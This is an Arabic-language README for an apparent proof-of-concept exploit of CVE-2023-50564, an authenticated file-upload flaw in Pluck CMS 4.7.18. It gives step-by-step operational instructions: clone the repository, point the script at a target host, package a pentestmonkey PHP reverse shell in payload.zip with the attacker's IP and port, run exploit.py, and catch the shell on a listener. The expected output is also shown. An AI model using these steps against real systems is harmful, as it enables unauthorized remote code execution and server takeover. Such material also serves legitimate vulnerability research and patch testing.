
إثبات مفهوم لثغرة CVE-2023-50564 في Pluck CMS الإصدار 4.7.18
يحتوي هذا المستودع على إثبات مفهوم (PoC) لثغرة CVE-2023-50564 في نظام Pluck CMS الإصدار 4.7.18

CVE-2023-50564 هي ثغرة تسمح برفع ملفات غير مصرح بها في نظام Pluck CMS الإصدار 4.7.18. يستغل هذا الاستغلال خللاً في وظيفة تثبيت الوحدات (modules) لرفع ملف ZIP يحتوي على قشرة PHP (PHP shell)، مما يتيح تنفيذ أوامر عن بُعد.
requests وrequests_toolbeltيمكنك تثبيت الحزم اللازمة باستخدام الأمر التالي:
pip install requests requests_toolbelt
git clone https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC.git
cd CVE-2023-50564_Pluck-v4.7.18_PoC
استبدل <hostname> باسم النطاق أو عنوان IP الخاص بالهدف في سكربت PoC.
أنشئ ملف payload.zip يحتوي على shell.php. أوصي باستخدام قشرة PHP العكسية (reverse shell) من pentestmonkey واستبدل حقلي <your_ip> و<port> بعنوان IP الخاص بك ومنفذ الاستماع.
شغّل سكربت PoC:
python exploit.py
سيُطلب منك إدخال المسار إلى ملف ZIP:
ZIP file path: ./path/to/payload.zip
Login successful
ZIP file upload successfuly.
<output of the executed shell.php>
ZIP file upload error. Response code: <code>
تأكد من أن ملف shell.php يحتوي على القشرة العكسية الصحيحة وأن المستمع (listener) لديك في انتظار الاتصال على المنفذ المحدد.